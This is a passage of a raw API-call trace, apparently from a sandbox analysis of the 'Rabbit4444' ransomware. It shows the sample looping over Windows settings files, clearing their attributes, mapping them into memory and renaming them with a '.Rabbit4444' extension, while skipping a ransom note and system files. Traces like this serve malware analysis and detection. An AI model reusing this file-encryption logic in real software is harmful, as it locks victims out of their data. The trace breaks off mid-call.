lstrlenW (lpString="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms") returned 64 [0059.532] lstrlenW (lpString="Rabbit4444") returned 10 [0059.532] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.532] lstrlenW (lpString=".dll") returned 4 [0059.532] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.532] lstrlenW (lpString=".lnk") returned 4 [0059.532] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.532] lstrlenW (lpString=".ini") returned 4 [0059.532] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.532] lstrlenW (lpString=".sys") returned 4 [0059.532] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.532] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.534] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.534] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15084468081) returned 1 [0059.534] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=866) returned 1 [0059.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0059.534] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x670, lpName=0x0) returned 0x298 [0059.535] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x670) returned 0x70000 [0059.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.536] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15084716075) returned 1 [0059.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0059.537] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.537] CloseHandle (hObject=0x298) returned 1 [0059.537] CloseHandle (hObject=0x278) returned 1 [0059.537] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms.Rabbit4444") returned 192 [0059.537] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.537] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5655e8fe, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5655e8fe, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", cAlternateFileName="CLE34F~1.SET")) returned 1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2=".") returned 1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="..") returned 1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="windows") returned -1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="boot") returned 1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.538] lstrcmpiW (lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.538] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms" | out: lpString1="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms") returned="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms" [0059.538] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.538] lstrlenW (lpString="Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms") returned 64 [0059.538] lstrlenW (lpString="Rabbit4444") returned 10 [0059.538] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.538] lstrlenW (lpString=".dll") returned 4 [0059.538] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.538] lstrlenW (lpString=".lnk") returned 4 [0059.538] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.538] lstrlenW (lpString=".ini") returned 4 [0059.538] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.538] lstrlenW (lpString=".sys") returned 4 [0059.538] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.538] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d5bac999-e706-4311-9db0-86e117b1fd25}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.539] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.539] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15084951019) returned 1 [0059.539] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1114) returned 1 [0059.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0059.539] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0059.540] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0059.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.541] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15085199003) returned 1 [0059.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0059.541] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.541] CloseHandle (hObject=0x298) returned 1 [0059.541] CloseHandle (hObject=0x278) returned 1 [0059.542] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms.Rabbit4444") returned 192 [0059.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d5bac999-e706-4311-9db0-86e117b1fd25}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D5BAC999-E706-4311-9DB0-86E117B1FD25}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d5bac999-e706-4311-9db0-86e117b1fd25}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.542] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x565f7286, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x565f7286, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x399, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", cAlternateFileName="CLC7A7~1.SET")) returned 1 [0059.542] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.542] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.542] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.542] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2=".") returned 1 [0059.542] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="..") returned 1 [0059.542] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="windows") returned -1 [0059.543] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.543] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.543] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="boot") returned 1 [0059.543] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.543] lstrcmpiW (lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.543] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms" | out: lpString1="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms") returned="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms" [0059.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.543] lstrlenW (lpString="Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms") returned 64 [0059.543] lstrlenW (lpString="Rabbit4444") returned 10 [0059.543] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.543] lstrlenW (lpString=".dll") returned 4 [0059.543] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.543] lstrlenW (lpString=".lnk") returned 4 [0059.543] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.543] lstrlenW (lpString=".ini") returned 4 [0059.543] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.543] lstrlenW (lpString=".sys") returned 4 [0059.543] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d652f9e4-08fd-4a24-8eac-05715188233e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.544] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.544] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15085430406) returned 1 [0059.544] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=921) returned 1 [0059.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.544] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0059.547] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0059.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.548] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.548] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.549] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15085945675) returned 1 [0059.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.549] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.549] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.549] CloseHandle (hObject=0x298) returned 1 [0059.549] CloseHandle (hObject=0x278) returned 1 [0059.549] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms.Rabbit4444") returned 192 [0059.549] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d652f9e4-08fd-4a24-8eac-05715188233e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D652F9E4-08FD-4A24-8EAC-05715188233E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d652f9e4-08fd-4a24-8eac-05715188233e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.550] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5668fbd5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5668fbd5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", cAlternateFileName="CL5209~1.SET")) returned 1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2=".") returned 1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="..") returned 1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="windows") returned -1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="boot") returned 1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.550] lstrcmpiW (lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.550] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms" | out: lpString1="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms") returned="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms" [0059.550] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.550] lstrlenW (lpString="Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms") returned 64 [0059.550] lstrlenW (lpString="Rabbit4444") returned 10 [0059.550] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.550] lstrlenW (lpString=".dll") returned 4 [0059.550] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.551] lstrlenW (lpString=".lnk") returned 4 [0059.551] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.551] lstrlenW (lpString=".ini") returned 4 [0059.551] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.551] lstrlenW (lpString=".sys") returned 4 [0059.551] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.551] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D679D992-D843-4D3C-BFEA-5EDF4D37EE9F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d679d992-d843-4d3c-bfea-5edf4d37ee9f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.551] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.551] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15086178435) returned 1 [0059.551] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1012) returned 1 [0059.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0059.551] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.552] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.554] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15086440016) returned 1 [0059.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0059.554] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.554] CloseHandle (hObject=0x298) returned 1 [0059.554] CloseHandle (hObject=0x278) returned 1 [0059.554] wsprintfW (in: 